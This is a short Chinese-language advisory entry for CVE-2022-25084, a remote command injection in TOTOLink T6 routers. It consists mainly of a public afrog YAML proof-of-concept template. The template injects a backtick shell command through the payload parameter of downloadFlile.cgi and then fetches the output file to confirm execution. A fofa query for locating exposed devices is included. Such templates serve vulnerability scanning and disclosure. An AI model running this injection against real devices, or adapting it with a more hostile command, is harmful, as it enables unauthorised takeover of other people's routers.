CVE-2022-25084: TOTOLink T6 V5.9c.4085_B20190428 Command Injection

漏洞描述

TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞，攻击者通过构造特殊的请求可以获取服务器权限 fofa: "totolink"

PoC代码[已公开]

id: CVE-2022-25084

info:
  name: TOTOLink T6 V5.9c.4085_B20190428 Command Injection
  author: zan8in
  severity: critical
  description: |-
    TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞，攻击者通过构造特殊的请求可以获取服务器权限
    fofa: "totolink"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25084
  tags: cve,cve2022,command-injection,totolink
  created: 2023/06/22

set:
  txt: randomLowercase(6)
rules:
  r0:
    request:
      method: GET
      path: /cgi-bin/downloadFlile.cgi?payload=`ls>../{{txt}}.txt`
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /{{txt}}.txt
    expression: response.status == 200 && response.body.bcontains(b'downloadFlile.cgi') && response.body.bcontains(b'cstecgi.cgi')
expression: r0() && r1()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-25084.yaml